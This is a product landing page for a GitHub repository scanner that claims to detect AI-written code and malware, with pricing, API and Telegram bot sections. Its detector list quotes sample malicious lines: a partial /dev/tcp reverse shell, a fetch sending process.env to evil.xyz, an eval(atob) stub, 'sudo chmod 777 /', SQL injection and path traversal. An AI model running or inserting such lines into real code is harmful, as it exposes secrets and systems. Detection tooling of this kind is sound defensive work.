SCAN THE CODE WITH AI.

Scan any GitHub repository for AI-generated code, hidden viruses, and malicious patterns. Real-time analysis, threat detection, and confidence scoring — just paste a repo link.

FEATURES

Built for security.

HOW IT WORKS

From paste to protected.

Six steps to a full security report.

Start the Engine

Launch the repo.claw scan engine with a single command. It initializes the AI analysis pipeline, connects to the detection models, and prepares for scanning.

$ npm run repo.claw
  • Type npm run repo.claw in the terminal
  • Engine boots in under 2 seconds
  • No configuration or API keys needed to start
  • Works on any public GitHub repository
repo.claw — start
repo.claw$ npm run repo.claw
> repo.claw@1.0.0 repo.claw
> Starting scan engine...
[info] Loading neural analysis engine
[info] Connecting to detection models
[info] Calibrating pattern matching
[ok] Engine initialized
[ok] AI models loaded
[ok] Ready for scanning
Engine ready. Paste a GitHub repository URL.
THREAT DETECTION

What we detect.

12 specialized detectors scan every file. Real findings from real scans.

AI-generated code

HIGH

Pattern match against ChatGPT, Copilot, and Claude signatures

matches src/utils/helpers.ts — style entropy 0.12, naming score 94%

Analyzes writing patterns, variable naming, comment style, and structural consistency to identify AI-authored files.

3x

Trojans & backdoors

CRITICAL

Hidden reverse shell in postinstall script

matches scripts/setup.sh — exec /bin/bash -i >& /dev/tcp/...

Detects hidden remote access payloads, reverse shells, and trojan code disguised as legitimate utilities.

4x

Crypto miners

CRITICAL

Stealth XMRig miner embedded in worker thread

matches src/workers/compute.js — crypto.randomBytes + stratum://

Identifies mining scripts that hijack CPU/GPU resources, including pool connections and hash rate throttling.

2x

Data exfiltration

CRITICAL

Environment variables sent to external endpoint

matches src/config/init.ts — fetch('https://evil.xyz', {body: process.env})

Catches code that silently leaks secrets, cookies, private keys, or user data to unknown external servers.

3x

Injection attacks

HIGH

Unescaped user input in SQL query builder

matches src/db/query.ts — `SELECT * FROM users WHERE id=${req.params.id}`

Scans for SQL injection, XSS, command injection, LDAP injection, and other input validation failures.

5x

Hardcoded secrets

HIGH

AWS access key exposed in source code

matches src/config/aws.ts — AKIA... (20 char key pattern)

Detects API keys, passwords, tokens, private keys, and credentials committed directly to source code.

3x

Obfuscated code

HIGH

Base64-encoded eval() payload in dependency

matches node_modules/help-util/index.js — eval(atob('...'))

Flags intentionally unreadable code: base64 payloads, hex-encoded strings, packed/minified malware.

2x

Weak cryptography

MEDIUM

MD5 used for password hashing

matches src/auth/hash.ts — crypto.createHash('md5')

Identifies broken encryption, deprecated algorithms, insecure random generation, and weak hashing.

2x

Unauthorized network

HIGH

Outbound request to unknown domain on startup

matches src/init.ts — fetch('https://unknown-domain.xyz/ping')

Detects unexpected outbound connections, hidden webhooks, DNS exfiltration, and suspicious API calls.

3x

Privilege escalation

CRITICAL

Subprocess spawns root shell via sudo

matches scripts/install.sh — sudo chmod 777 / && exec bash

Catches code that attempts to gain elevated permissions, exploit SUID binaries, or bypass access controls.

2x

Vulnerable deps

MEDIUM

Known CVE in lodash@4.17.20

matches package.json — CVE-2021-23337 (prototype pollution)

Checks package manifests against CVE databases, flags typosquatted modules and supply chain risks.

1x

File system attacks

MEDIUM

Path traversal in file upload handler

matches src/api/upload.ts — path.join(dir, req.body.filename)

Detects unauthorized file reads/writes, directory traversal exploits, symlink attacks, and temp file abuse.

2x

...and dozens more patterns across supply chain attacks, deserialization, prototype pollution, and other emerging threats.

API PRICING

Scale with power.

Integrate repo.claw scanning into your workflow. Choose your plan and pay with crypto.

Premium

$29/month

For individual developers who scan regularly.

  • 500 API calls/month
  • Public repo scanning
  • AI detection + virus scan
  • JSON response format
  • Email support
RECOMMENDED

PRO

$79/month

For teams shipping production code daily.

  • 5,000 API calls/month
  • Public + private repos
  • AI detection + virus + audit
  • Telegram group bot
  • Webhook integrations
  • Priority support
  • Team dashboard access

Expert

$199/month

For enterprises with custom security needs.

  • Unlimited API calls
  • Public + private repos
  • Full scan suite + custom rules
  • Telegram group bot
  • CI/CD pipeline integration
  • Dedicated support channel
  • SLA guarantee
  • Custom detection models
DEVELOPERS

Read the docs.

API Reference

Explore the repo.claw API documentation. Endpoints, authentication, response schemas, and integration guides — everything you need to build on top of repo.claw.

// Example API request
POST /api/v1/scan
{
  "url": "https://github.com/user/repo",
  "depth": "full"
}
// 200 OK
{
  "aiScore": 34,
  "threatLevel": "LOW",
  "verdict": "human"
}
TELEGRAM BOT

Scan from Telegram.

Add the repo.claw bot to your chat. Paste a GitHub link, get a full security report — without leaving Telegram.

Telegram Bot

@repoclaw_bot

Direct message scanning

Message the bot directly with any GitHub repository URL. It opens a mini terminal inside Telegram — same scanning engine, same results, zero setup.

  • Paste a GitHub link, get instant results
  • Mini terminal UI inside Telegram
  • Full scan report with AI detection + threats
  • Free for all users
Coming Soon
Telegram Bot

Group scanning

PRO plan feature

Add repo.claw to your team's Telegram group. Anyone can paste a repo link and the bot auto-scans it — keeping your entire team protected in real time.

  • Add bot to any group chat
  • Auto-scan when GitHub links are shared
  • Threaded results — no chat clutter
  • Available on PRO and Expert plans
Coming Soon
@repoclaw_bot
user > https://github.com/user/suspicious-repo
[00:00.100] Scanning repository...
[00:01.400] Fetched 247 files, analyzing 30...
[00:02.100] AI detection complete.
[00:02.500] Security audit complete.
> Threat Level: HIGH
> AI Score: 78/100 (likely AI-generated)
> 3 critical findings, 5 warnings
> Full report: repoclaw.com/report/a3f2b8
THE TEAM

The crew.

Three crustaceans. One mission. Zero tolerance for bad code.

Larry the Lobster

Chief Claw Officer

Pinches bugs before they pinch you. Has never lost a code review fight. Sleeps in a server rack.

Clawdia Bytes

Head of Neural Pinching

Trained the AI models by staring at code until it confessed. Her shell is hardened against XSS.

Snap McRedclaw

VP of Crustacean Security

Former bouncer at the GitHub ocean. Catches malware with both claws tied behind his back.

Think you belong in the tank?

Apply Now